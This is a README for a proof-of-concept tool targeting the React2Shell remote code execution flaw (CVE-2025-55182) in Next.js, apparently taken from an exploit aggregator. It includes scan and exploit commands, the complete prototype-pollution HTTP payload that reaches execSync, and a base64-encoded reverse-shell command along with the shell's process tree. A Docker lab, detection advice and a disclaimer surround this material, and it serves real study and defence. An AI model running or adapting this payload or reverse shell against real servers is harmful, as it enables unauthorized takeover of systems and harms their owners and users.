Share
## https://sploitus.com/exploit?id=8030509C-EE8F-5FBA-9CAA-8D9B926929AD
# ๐Ÿ’ฅ React2Shell-POC ๐Ÿ’ฅ 
![python](https://img.shields.io/badge/python-3.11%2B-blue) 
![Next.js](https://img.shields.io/badge/Next.js-16.0.6-blueviolet)
![Docker](https://img.shields.io/badge/Docker-Container-blue)

A collection of scripts / tools to experiment with the React2Shell vulnerability.

## Overview

This repository demonstrates the [React2Shell](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components) vulnerability affecting specific versions of Next.js and React Server Components, tracked as [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182). This project includes:

- A Python script to scan and/or exploit vulnerable endpoints.
- A Dockerfile to build a deliberately vulnerable Next.js application for testing.
- A defenderโ€™s perspective on React2Shell, with potential detection strategies.

## โšก Quickstart Guide

### 1. Clone the Repository

```bash
git clone https://github.com/malwaredetective/React2Shell-POC.git
cd React2Shell-POC
```

### 2. Set Up a Python Virtual Environment

```bash
python3 -m venv venv

# Run this command to activate your Python Virtual Environment within Linux/macOS
source venv/bin/activate

# Run this command to activate your Python Virtual Environment within Windows
venv\Scripts\activate
```

### 3. Install Python Dependencies

```bash
pip install -r requirements.txt
```

### 4. Scan your Target Endpoints

By default, [React2Shell.py](React2Shell.py) will only send a null payload to test if the target is vulnerable.

```bash
python3 React2Shell.py --url http://localhost:3000/
```

If the target is vulnerable to CVE-2025-55182, the script will notify you within the output.

```bash
python3 React2Shell.py --url http://172.20.217.135:3000
[INFO] Scanning: http://172.20.217.135:3000 for the React2Shell CVE ...

[PWNED] VULNERABLE to CVE-2025-55182: http://172.20.217.135:3000.
  - HTTP error returned!
  - Next.js/React error digest detected in response!
  - Patch immediately! See advisories: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components.
```

If the target is NOT vulnerable to CVE-2025-55182, the script will notify you within the output.

```bash
python3 React2Shell.py --url http://windowsforensics.net
[INFO] Scanning: http://windowsforensics.net for the React2Shell CVE ...

[OK] The target is not vulnerable: http://windowsforensics.net.
```

To trigger RCE using React2Shell, you need to include the `--exploit` flag and your payload within the `--cmd` parameter.

```bash
python3 React2Shell.py --url http://localhost:3000/ --exploit --cmd "cmd.exe /c calc.exe"
```

## ๐Ÿณ Building a Vulnerable Node Application with Docker

The Dockerfile included within this repository will spin up a default node application running Next.js version 16.0.6, which is vulnerable to the React2Shell CVE. 

> **Note:** This application is vulnerable by design. **Never expose it to the internet!**

### Build the Docker Image

```bash
docker build -t vulnerable-react2shell-app .
```

### Run the Container

```bash
docker run -it --rm -p 3000:3000 vulnerable-react2shell-app
```

## ๐Ÿ”Ž Analyzing React2Shell from a Defender's Perspective

The exploit is delivered via an HTTP POST request. Because the attack leverages legitimate application endpoints, it could be difficult to distinguish malicious traffic from normal user activity in web logs. 

That being said, many commercial WAF providers have already implemented detection logic for this CVE and I'd recommend enabling those rules on any production applications.

I uploaded a full [packet capture](packet-capture.pcap) of the initial scan and successful exploitation against a vulnerable application.

Here is the HTTP POST request made by [React2Shell.py](React2Shell.py) when scanning the target for the CVE. The script analyzes the response from the target server to identify whether or not the server is vulnerable.

```http
POST / HTTP/1.1
Host: 172.20.217.135:3000
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80196a6396324d35
Next-Action: 9fc786f413e34a478451b642105796f0
X-Nextjs-Request-Id: 7ad30895-bcbb-4458-bd57-abe580a4006a
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
Content-Length: 232

------WebKitFormBoundary80196a6396324d35
Content-Disposition: form-data; name="1"

{}
------WebKitFormBoundary80196a6396324d35
Content-Disposition: form-data; name="0"

["$1:a:a"]
------WebKitFormBoundary80196a6396324d35--

HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-store, must-revalidate
Content-Type: text/x-component
Content-Encoding: gzip
Date: Wed, 10 Dec 2025 21:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

:N1765401693616.3784
0:{"a":"$@1","f":"","b":"development"}
1:D{"time":0.28295799996703863}
1:E{"digest":"1430255494","name":"TypeError","message":"Cannot read properties of undefined (reading 'a')","stack":[],"env":"Server","owner":null}
```

The next HTTP POST request in the PCAP, is a successful attempt at obtaining a reverse shell on the target. The corresponding payload was: `python3 React2Shell.py --url http://172.20.217.135:3000 --exploit --cmd 'echo c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjIxNy4xMzUvOTAwMSAwPiYx | base64 -d | bash'`.


```http
POST / HTTP/1.1
Host: 172.20.217.135:3000
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20242cd06a8246b9
Next-Action: 522a33fe16d7462fb41a936ca9c87721
X-Nextjs-Request-Id: 1f81ac3c-f5c7-4084-accf-1eacdfcba12c
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
Content-Length: 640

------WebKitFormBoundary20242cd06a8246b9
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('echo c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjIxNy4xMzUvOTAwMSAwPiYx | base64 -d | bash');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundary20242cd06a8246b9
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundary20242cd06a8246b9
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundary20242cd06a8246b9--
```

Monitoring your endpoints for unexpected child processes spawned by `node` is likely your best opportunity for detection. For example, after performing our demo exploitation, the process tree shows the node application spawning a reverse shell.

```
root@412435a91fdc:/app/vulnerable-next-js-app# ps -axjf
   PPID     PID    PGID     SID TTY        TPGID STAT   UID   TIME COMMAND
      0     137     137     137 pts/1        149 Ss       0   0:00 bash
    137     149     149     137 pts/1        149 R+       0   0:00  \_ ps -axjf
      0       1       1       1 pts/0        134 Ssl      0   0:00 npm run dev
      1      18       1       1 pts/0        134 S        0   0:00 sh -c next dev
     18      19       1       1 pts/0        134 Sl       0   0:00  \_ node /app/vulnerable-next-js-app/node_modules/.bin/next dev
     19      30       1       1 pts/0        134 Sl       0   0:08      \_ next-server (v16.0.6)
     30      82       1       1 pts/0        134 Sl       0   0:00          \_ node /app/vulnerable-next-js-app/.next/dev/build/postcss.js 36051
     30     130       1       1 pts/0        134 S        0   0:00          \_ /bin/sh -c echo c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjIxNy4xMzUvOTAwMSAwPiYx | base64 -d | bash
    130     133       1       1 pts/0        134 S        0   0:00              \_ bash
    133     134     134       1 pts/0        134 S+       0   0:00                  \_ sh -i
```

> **Important Note**: Unlike Apache and IIS, it is not unusual for Node.js applications to spawn CMD, PowerShell, or Bash. This makes process-based detection challenging and context-dependent. Depending on your environment, this detection logic will likely require additional tuning before going into production.

## ๐Ÿ“ข References

- [https://react2shell.com/](https://react2shell.com/): The official writeup on React2Shell from the original author of the POC.
- [Official React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components): The official announcement about the CVE from the React Team and their guidance on remediation.
- [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182): A link to the CVE-2025-55182 vulnerability entry within NIST.
- Detection logic was adapted from the [Burp Suite Community | React2Shell](https://github.com/PortSwigger/bambdas/blob/main/CustomScanChecks/CVE-2025-55182CVE-2025-66478-React2Shell.bambda) scanner when creating the Python script. 

## ๐Ÿ›ก๏ธ Disclaimer

This POC is intended for educational purposes. **Do not scan or exploit systems without explicit permission!**